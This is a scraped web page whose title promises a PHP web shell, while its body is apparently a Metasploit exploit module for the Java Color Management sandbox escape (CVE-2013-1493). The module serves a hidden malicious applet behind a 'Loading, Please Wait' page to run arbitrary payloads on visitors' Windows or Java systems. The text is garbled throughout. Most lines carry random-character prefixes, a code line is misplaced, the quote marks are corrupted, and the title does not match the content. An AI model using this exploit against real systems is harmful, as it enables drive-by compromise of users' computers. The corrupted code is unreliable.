STUNSHELL PHP Web Shell远程执行代码

admin

##
9 s% n3 Q9 O  F* }7 ?) P: m7 x
# This file is part of the Metasploit Framework and may be subject to
2 h; x' Z: m' ]2 p/ P* S( M( _# redistribution and commercial restrictions. Please see the Metasploit
& B" F/ P5 r2 u3 @$ s* K# web site for more information on licensing and terms of use.
- w. V' v( i( K9 l( H+ N. L9 q. c# http://metasploit.com/
" d, Q+ t" w0 c1 X( B##
0 Z8 Y8 P) `# ]9 {% s0 j0 ?# qrequire ‘msf/core’
6 P( J6 g- s0 a0 ?( N3 {" @; n& Urequire ‘rex’
4 H8 U2 T0 _, t4 b) ~. J- Z( {class Metasploit3 < Msf::Exploit::Remote
9 r! E- z+ r3 C" X6 Y2 o5 lRank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
0 s& u/ d: R9 G% [2 H. B. e) jinclude Msf::Exploit::EXE
include Msf::Exploit::Remote::BrowserAutopwn
2 P; }7 h& E' ^+ g4 x  U- ]# |autopwn_info({ :javascript => false })
( w$ E- t5 Q" ]: a: _- I$ R& c: Cdef initialize( info = {} )
super( update_info( info,
) e, ~; l# c, |! I‘Name’ => ‘Java CMM Remote Code Execution’,
‘Description’ => %q{
This module abuses the Color Management classes from a Java Applet to run
" G: P6 @+ O- {( l" sarbitrary Java code outside of the sandbox as exploited in the wild in February
; C( k* _5 S- Gand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
# y: W2 ?. a- q* u2 \and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
systems. This exploit doesn’t bypass click-to-play, so the user must accept the java
2 e( |; C: L. j+ z) D- G7 a# j4 Nwarning in order to run the malicious applet.
2 f# C0 \/ `* a* @4 g: E6 P},
‘License’ => MSF_LICENSE,
: @  Q- F$ K5 Z7 R0 G3 y‘Author’ =>
* Y3 ~, m/ d0 `$ q' l% l'Unknown', # Vulnerability discovery and Exploit
'juan vazquez' # Metasploit module (just ported the published exploit)
],
& d7 l2 P2 V' k6 [9 G. h‘References’ =>
[
[ 'CVE', '2013-1493' ],
9 M3 B& y$ K* H/ @. }[ 'OSVDB', '90737' ],
[ 'BID', '58238' ],
. C. k6 w) W9 h: G[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
2 b2 [8 H0 y9 c[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
3 S$ n5 [( B8 W! D: e! J; X8 `( _; U[ 'URL', 'http://pastie.org/pastes/6581034' ]
],
6 k9 S2 t' S* Z8 s3 n6 o* t! ~% {‘Platform’ => [ 'win', 'java' ],
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
‘Targets’ =>
; _9 X# l" A- P+ f" K- k/ O[
[ 'Generic (Java Payload)',
# G3 A% z+ U( O6 }5 q2 P3 \& j' [; ~{
'Platform' => 'java',
& [% z% o/ `2 k6 R" t& ?% J- n'Arch' => ARCH_JAVA
}
],
[ 'Windows x86 (Native Payload)',
/ A) H6 K3 {# y/ U; C( `  h( I{
# Z! k, Q: y9 @/ m" Y( X; Z'Platform' => 'win',
: L8 ~' d3 B) L'Arch' => ARCH_X86
2 q* v: @$ x" V2 c}
]
/ E/ K, ?5 R  a. ~: T  O9 S1 [0 w& C],
2 q/ t" D. }. n) L4 T‘‘DisclosureDate’ => ‘Mar 01 2013′
))
end
def setup
+ m7 W  P! Q7 e; r$ U* Rpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
6 H7 E. t! c! n. Cpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
. b: |; L; T3 ?: D0 w8 }@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
# j; I, v% M' w3 |path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
! U# B# C6 C# M% ^) n% _/ I@init_class_name = rand_text_alpha(“Init”.length)
$ M% |8 [, s% k) |% @& F( U@init_class.gsub!(“Init”, @init_class_name)
super
1 u3 d8 X- ?$ V  nend
) X' C7 I8 J7 Qdef on_request_uri(cli, request)
print_status(“handling request for #{request.uri}”)
: V, Q1 x9 [  ^& `/ r' @case request.uri
when /\.jar$/i
jar = payload.encoded_jar
jar.add_file(“#{@init_class_name}.class”, @init_class)
3 l6 N( ?0 x- F' U: l7 Y! m  yjar.add_file(“Leak.class”, @leak_class)
5 x) _8 M2 D$ [( Vjar.add_file(“MyBufferedImage.class”, @buffered_image_class)
jar.add_file(“MyColorSpace.class”, @color_space_class)
DefaultTarget’ => 1,
metasploit_str = rand_text_alpha(“metasploit”.length)
payload_str = rand_text_alpha(“payload”.length)
% L" z! U/ |: K5 t$ K7 `. r# Ijar.entries.each { |entry|
' [9 x% a( ^( h4 }; [. bentry.name.gsub!(“metasploit”, metasploit_str)
8 x3 b; V* V$ x7 }4 \entry.name.gsub!(“Payload”, payload_str)
, h1 Q: P# }- y5 k7 dentry.data = entry.data.gsub(“metasploit”, metasploit_str)
entry.data = entry.data.gsub(“Payload”, payload_str)
}
; e  P0 k. R. O( ~6 C  x3 jjar.build_manifest
5 W; J1 ^6 ?0 W# x2 ^/ Ssend_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
4 I; {5 u/ L) O* @when /\/$/
payload = regenerate_payload(cli)
if not payload
print_error(“Failed to generate the payload.”)
4 s" J& ?8 Z' r8 a4 ^. f9 g, k/ |send_not_found(cli)
2 B* ~6 }2 L; V8 wreturn
7 C& j- [6 I( C1 C" jend
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
else
3 \6 Z9 ~! y2 E, i: K8 y, _2 Xsend_redirect(cli, get_resource() + ‘/’, ”)
# ?% c, Y- l3 ^end
end
def generate_html
4 u; T5 i/ R! Jhtml = %Q|<html><head><title>Loading, Please Wait…</title></head>|
; I* x5 m8 l7 `html += %Q|<body><center><p>Loading, Please Wait…</p></center>|
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
) J! y% B0 r$ shtml += %Q|</applet></body></html>|
6 p$ J! N7 x3 Y. n" H! g4 @) }8 P9 Rreturn html
end
) y# ]+ Y9 _5 C/ Zend
9 r' U+ |/ z# g' G% C8 Yend
4 J; \1 l8 B6 f' X